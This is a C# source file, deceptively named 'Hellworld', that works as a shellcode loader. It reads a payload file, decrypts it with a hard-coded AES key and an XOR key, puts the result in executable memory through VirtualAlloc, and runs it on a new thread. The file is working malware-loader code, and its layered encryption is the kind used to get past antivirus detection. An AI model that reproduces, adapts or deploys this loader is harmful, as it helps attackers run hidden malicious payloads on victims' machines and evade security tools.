using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;
using System.Security.Cryptography;
using System.Text;
namespace Hellworld
{
class Program
{
static void Main()
{
string password = "abcdefgh12345678abcdefgh12345678";
byte[] AES = File.ReadAllBytes(@"payload.txt");
string str = Encoding.UTF8.GetString(AES);
//Console.WriteLine(str);
string Base64str = Decrypt(str, password);
switch (Base64str.Length % 4)
{
case 2:
str += "==";
break;
case 3:
str += "=";
break;
}
byte[] bytes = Convert.FromBase64String(Base64str.Replace('-', '+').Replace('_', '/'));
byte[] ok = XORDecrypt(bytes);
code(ok);
}
public static string Decrypt(string showText, string AESKey)
{
string result = string.Empty;
try
{
byte[] cipherText = Convert.FromBase64String(showText);
int length = cipherText.Length;
SymmetricAlgorithm rijndaelCipher = Rijndael.Create();
rijndaelCipher.Key = Convert.FromBase64String(AESKey);//加解密双方约定好的密钥
byte[] iv = new byte[16];
Buffer.BlockCopy(cipherText, 0, iv, 0, 16);
rijndaelCipher.IV = iv;
byte[] decryptBytes = new byte[length - 16];
byte[] passwdText = new byte[length - 16];
Buffer.BlockCopy(cipherText, 16, passwdText, 0, length - 16);
using (MemoryStream ms = new MemoryStream(passwdText))
{
using (CryptoStream cs = new CryptoStream(ms, rijndaelCipher.CreateDecryptor(), CryptoStreamMode.Read))
{
cs.Read(decryptBytes, 0, decryptBytes.Length);
cs.Close();
ms.Close();
}
}
result = Encoding.UTF8.GetString(decryptBytes).Replace("\0", ""); ///将字符串后尾的'\0'去掉
}
catch { }
return result;
}
public static byte[] XORDecrypt(byte[] input)
{
char[] key = { 'M', '3', };
byte[] output = new byte[input.Length];
for (int i = 0; i < input.Length; i++)
{
output[i] = (byte)(input[i] ^ key[i % key.Length]);
}
return output;
}
public static bool code(byte[] code)
{
try
{
UInt32 funcAddr = VirtualAlloc(0, (UInt32)code.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(code, 0, (IntPtr)(funcAddr), code.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return true;
}
catch (Exception e)
{
Console.Error.WriteLine("exception: " + e.Message);
return false;
}
}
// Used to Load Shellcode into Memory:
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
}
}
